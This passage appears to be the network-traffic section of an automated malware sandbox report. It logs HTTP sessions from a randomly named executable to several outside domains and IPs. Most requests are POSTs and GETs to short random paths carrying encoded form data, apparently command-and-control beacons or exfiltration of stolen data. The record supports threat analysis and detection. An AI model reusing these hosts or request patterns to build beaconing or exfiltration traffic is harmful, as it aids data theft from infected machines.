                  Data Ascii: n02X2xPX=ZfgZOZYDN/qE1X23TSo1Ws5uMexTOx+v+qRQqtsn3herAn3/EWflNIM5ep+lAs9hKVCLquHrpiXVXBiw5jpSYAgq3zStMeGF5IxlnZn7Xshb+3zZvNbBhL+8hlvdM1AGOjVaOyYMFnKgL3Wi/NBdeLVWIuvih8kVOui2aFZreTrQLw4brgW9TJ2hbVO5QLFPc8E8CiauNpI2+A9K+UHD6c0=
                  Jul 4, 2024 03:13:26.743859053 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:26 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  28 | 192.168.2.4 | 49770 | 38.47.232.224 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:28.367280006 CEST | 10846 | OUT | POST /rmef/ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.ytw6.top
                  Referer: http://www.ytw6.top/rmef/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 31 58 32 33 54 53 6f 31 57 73 35 75 4d 65 78 54 4f 78 2b 76 2b 71 52 51 71 74 73 6e 33 68 57 72 42 55 50 2f 56 45 33 6c 66 34 4d 35 43 5a 2b 6d 41 73 38 37 4b 56 61 50 71 75 4c 52 70 67 66 56 59 43 71 77 2f 52 42 53 4c 67 67 71 71 6a 53 73 42 2b 47 71 35 49 67 74 6e 59 58 37 58 73 68 62 2b 32 44 5a 76 63 62 42 78 37 2b 7a 69 6c 76 61 62 6c 41 2b 4f 69 38 68 4f 79 56 35 46 55 43 67 46 7a 32 69 36 34 56 64 44 62 56 55 4c 75 76 36 68 38 34 4b 4f 75 2f 4a 61 41 6c 46 65 52 33 51 4c 45 4e 38 30 42 75 53 47 35 69 6a 4f 46 36 4a 66 71 78 4c 51 74 41 62 4a 79 32 68 52 62 49 34 2f 77 51 63 69 6d 6a 6d 35 4d 31 78 67 61 76 50 57 66 52 54 2b 38 53 75 70 41 41 4a 30 61 4c 78 73 32 65 57 5a 78 55 64 73 4a 63 4c 6e 38 78 76 73 77 45 67 58 7a 77 33 48 72 4c 52 6b 58 46 66 45 73 54 34 70 68 72 66 64 50 58 4b 69 7a 49 72 46 35 4b 6a 69 6d 57 63 50 2f 2f 50 64 46 2b 6a 46 4b 35 34 37 65 2f 38 55 51 58 6b 57 76 52 5a 30 58 34 74 6b 6b 6c 38 64 63 50 45 56 [TRUNCATED]
                  Data Ascii: n02X2xPX=ZfgZOZYDN/qE1X23TSo1Ws5uMexTOx+v+qRQqtsn3hWrBUP/VE3lf4M5CZ+mAs87KVaPquLRpgfVYCqw/RBSLggqqjSsB+Gq5IgtnYX7Xshb+2DZvcbBx7+zilvablA+Oi8hOyV5FUCgFz2i64VdDbVULuv6h84KOu/JaAlFeR3QLEN80BuSG5ijOF6JfqxLQtAbJy2hRbI4/wQcimjm5M1xgavPWfRT+8SupAAJ0aLxs2eWZxUdsJcLn8xvswEgXzw3HrLRkXFfEsT4phrfdPXKizIrF5KjimWcP//PdF+jFK547e/8UQXkWvRZ0X4tkkl8dcPEVfM0fWVv6DvYriqmdhrPXWC1QJI9tYNUSfOHaEAaJiIvcI7k3S0Z8ERGa0855MrXLqxzhueI3TNf+L5ak26XqQ6C1HLOviA0+gptvuKBr5TvdzUb3y5U0fss/zyrP4HslrKtop+TfUQwwkEzbwEzS42j2Uv8N7ofk4X9tQvFZ559XFQFdF4Ft3gy0MJzTJcZ8vDWPNYVSpanfw2o8zjKK/39nO3W+TQb825tVqJihfnu1gpCs0XswdV6s5jLNcs9nJI18ojZ14NuoiM1cMvGWYQrD0jfaVPmD3P0pboz4fsFo6n4xRtwdoj7kiBDcuEw/FV+hzvXTlHETwIJ60XHUgBbyXk2TGiHRQS1qAPufj737quvs304+boP0Mc4enYIzrzGzzQUBnrz5Nk1Roz+HxBs41VZVCsKwaBA8TS1kDnr5dyb2J5Hog/TbVulW3b8IEssXEql2GNh955ZbEOsMf6geLqoWyFlQkkEPlcTqvuSuRNQ2QtcakzTmzYN+iWzF8T01aakYqiRaYbnSwxKmr5by5MD2BX5dVfHwUR1v1teVRIuLaQjwOCCz5uUM3r6vbjMCbOyodvLY/P1ZD8bllgE2HtvNqOHduoj5oT/kFVGZYJDOvG6TmDJL+KhlNdVUXOTLFLEgLbxKgpy6l+FsbQSH9OnAOrVGoZ [TRUNCATED]
                  Jul 4, 2024 03:13:29.279330015 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:29 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  29 | 192.168.2.4 | 49771 | 162.241.253.174 | 80 | 3760 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:29.265779018 CEST | 514 | OUT | GET /nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Host: www.ndhockeyprospects.com
                  Connection: close
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Jul 4, 2024 03:13:30.462892056 CEST | 646 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Thu, 04 Jul 2024 01:13:30 GMT
                  Server: nginx/1.21.6
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 0
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  X-Redirect-By: WordPress
                  Content-Security-Policy: upgrade-insecure-requests
                  Location: http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=
                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                  X-Endurance-Cache-Level: 2
                  X-nginx-cache: WordPress
                  X-Server-Cache: true
                  X-Proxy-Cache: MISS


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  30 | 192.168.2.4 | 49772 | 38.47.232.224 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:30.898164034 CEST | 493 | OUT | GET /rmef/?n02X2xPX=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:31.825758934 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:31 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 49773 | Destination IP: 35.190.52.58 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:45.175297022 CEST | 753 | OUT | POST /2e2r/ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.hsck520.com
                  Referer: http://www.hsck520.com/2e2r/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Ascii: n02X2xPX=5cGoY+T6DVyw40xEmqvri+79NBR9kytB9X8cwlCtjEWaCBdzgx6UhOhh98osBKIVYfl+j0dyhRmPT3gcMmlr9tqZEtTrsiO6mWuuExIAMXhUwNWF38gr9MzIAFhdGxHCCsWAd4ft2rbafgdnDnRxn/fupV/GMZfA9CeEGUpLM8g9u2lWx92ExRt575wYLogn3A==
                  Jul 4, 2024 03:13:45.841424942 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:45 GMT
                  Content-Type: text/html
                  Content-Length: 559
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:45.844921112 CEST | 559 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                  Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 49774 | Destination IP: 202.95.21.152 | Destination Port: 80 | PID: 3760 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:46.020454884 CEST | 769 | OUT | POST /3in6/ HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Content-Length: 199
                  Connection: close
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Origin: http://www.qmancha.com
                  Referer: http://www.qmancha.com/3in6/
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Data Ascii: b4=McAYGJEYjxZmY1jgYkvxiUEn8nBU/ekXTP/QVceGweMGWtpcElgVrlQYKGqm2lID9LMJadgpoDwSzcxCfMvNQYUMmrri3QaN9gy7m5bxIAbpAFdX/ZZplaR0Bzlw8RNO2wnx6O6zYpPWreJQ9IIPdpWny/EgdTq12y0HJoqVgw5iXcleUtdoK+n5IHw/2E45Pw==
                  Jul 4, 2024 03:13:46.965007067 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:46 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 49775 | Destination IP: 35.190.52.58 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:47.726028919 CEST | 773 | OUT | POST /2e2r/ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.hsck520.com
                  Referer: http://www.hsck520.com/2e2r/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Ascii: n02X2xPX=5cGoY+T6DVyw4UhEkJ3rq+7+BhR9tSsI9Xwcwk29g3yaChtzhw6Uy+hhpsotOqIaYfoDjwZyhVGPT3wcMRJq99qbR9TloiO6mWuuExcqMX5Uw9GF2dgowszJQVhdXhHGCsWmd5zH2ojaflZnD2R2yPfom1+ecYqvzSjlLkh6Fe8kvw0MgMXTjRJKm+5sGrdusEDsK/TivEVJQND2tL6kIQ4=
                  Jul 4, 2024 03:13:48.393785954 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:48 GMT
                  Content-Type: text/html
                  Content-Length: 559
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:48.397483110 CEST | 559 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                  Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 49776 | Destination IP: 202.95.21.152 | Destination Port: 80 | PID: 3760 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:48.555866003 CEST | 789 | OUT | POST /3in6/ HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Content-Length: 219
                  Connection: close
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Origin: http://www.qmancha.com
                  Referer: http://www.qmancha.com/3in6/
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Data Ascii: b4=McAYGJEYjxZmX1TgZH3xqUEkzHBU1+kLTPDQVZmWwtoGT9ZcHh0VqlQYCmqp8FI29LI3accpoCQSzdBCf/HMRIUOuLqkoAaN9gy7m4/bIADpA1tX99NumaR1Gzlw2xMm2wnp6LjYYrHWrf5Q+dkMEZWt/fF+cRLCsXILKo2FjzVbWa0EFc8/Y+DKVA5L7HFwU4QuAR/190rOvy4YTBz4uW4=
                  Jul 4, 2024 03:13:49.515157938 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 49777 | Destination IP: 35.190.52.58 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:50.257460117 CEST | 10855 | OUT | POST /2e2r/ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.hsck520.com
                  Referer: http://www.hsck520.com/2e2r/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:50.931133986 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:50 GMT
                  Content-Type: text/html
                  Content-Length: 559
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:50.934201002 CEST | 559 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                  Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 49778 | Destination IP: 202.95.21.152 | Destination Port: 80 | PID: 3760 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:51.085139990 CEST | 10871 | OUT | POST /3in6/ HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Content-Length: 10299
                  Connection: close
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Origin: http://www.qmancha.com
                  Referer: http://www.qmancha.com/3in6/
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Jul 4, 2024 03:13:52.042428970 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:51 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session ID: 37 | Source IP: 192.168.2.4 | Source Port: 49779 | Destination IP: 35.190.52.58 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:52.790652990 CEST | 496 | OUT | GET /2e2r/?n02X2xPX=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:53.623119116 CEST | 300 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:53 GMT
                  Content-Type: text/html
                  Content-Length: 5161
                  Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                  Vary: Accept-Encoding
                  ETag: "65a4939c-1429"
                  Cache-Control: no-cache
                  Accept-Ranges: bytes
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:53.623135090 CEST | 1236 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                  Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
